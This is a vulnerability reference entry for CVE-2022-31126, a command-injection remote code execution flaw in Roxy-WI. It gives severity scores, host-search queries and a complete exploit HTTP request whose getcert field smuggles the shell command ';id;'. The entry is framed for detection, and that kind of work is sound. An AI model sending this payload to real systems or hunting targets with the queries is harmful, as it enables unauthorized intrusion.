🔙 목록으로 돌아가기

CVE-2022-31126: Roxy-WI - Remote Code Execution

TitleRoxy-WI - Remote Code Execution
Authorritikchaddha
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
RemediationUsers are advised to upgrade to latest version.
CVSS Score9.8
EPSS Score0.91464
CVE IDCVE-2022-31126
CWE IDCWE-74
Shodan Queryhtml:"Roxy-WI"
Fofa Querybody="roxy-wi"
Tags cve2022 cve rce roxy roxy-wi vkev vuln

🔍 Vulnerability Description

Roxy-WI before 6.1.1.0 is susceptible to remote code execution. System commands can be run remotely via the ssh_command function without processing the inputs received from the user in the /app/funct.py file.

🌐 HTTP Request

POST /app/options.py HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15
Connection: close
Content-Length: 67
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.victim.com/app/login.py
Accept-Encoding: gzip

show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcert=;id;

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-31126.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-31126.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A